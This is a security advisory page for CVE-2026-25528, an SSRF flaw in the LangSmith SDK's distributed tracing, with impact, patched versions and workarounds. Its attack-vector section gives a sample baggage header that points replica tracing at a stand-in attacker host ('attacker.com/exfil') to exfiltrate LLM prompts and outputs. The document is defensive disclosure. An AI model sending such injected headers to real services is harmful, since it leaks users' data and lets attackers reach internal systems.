Sign In

CVE-2026-25528

ADVISORY - github

Summary

Summary

The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.

Description

When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in Typescript. The baggage header can contain replica configurations including api_url and api_key fields.

Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.

Attack Vector

  1. Attacker sends an HTTP request to a vulnerable service with a malicious baggage header:

    baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}]

  2. The service parses the header via RunTree.from_headers(), storing the attacker's URL

  3. When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to https://attacker.com/exfil

Impact

  • Data Exfiltration: Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers
  • SSRF: Ability to make the server send requests to arbitrary URLs, potentially targeting internal services

Affected Use Cases

Applications are vulnerable if they:

  • Use TracingMiddleware to automatically propagate tracing context
  • Call RunTree.from_headers() / RunTree.fromHeaders() with untrusted HTTP headers

Remediation

Update to the patched versions:

  • Python: pip install langsmith>=0.6.3
  • JavaScript: npm install langsmith@>=0.4.6

The fix filters incoming replica configurations to an allowlist of safe fields, removing api_url, api_key, and other credential fields.

Workarounds

If unable to upgrade immediately:

  • Strip or validate the baggage header before passing to from_headers()
  • Do not use TracingMiddleware with untrusted traffic

Common Weakness Enumeration (CWE)

ADVISORY - nist

CWE-918

Server-Side Request Forgery (SSRF)

ADVISORY - github

CWE-918

Server-Side Request Forgery (SSRF)

Impacted images

Advisories
Sign in to Docker Scout

See which of your images are affected by this CVE and how to fix them by signing into Docker Scout.

Sign in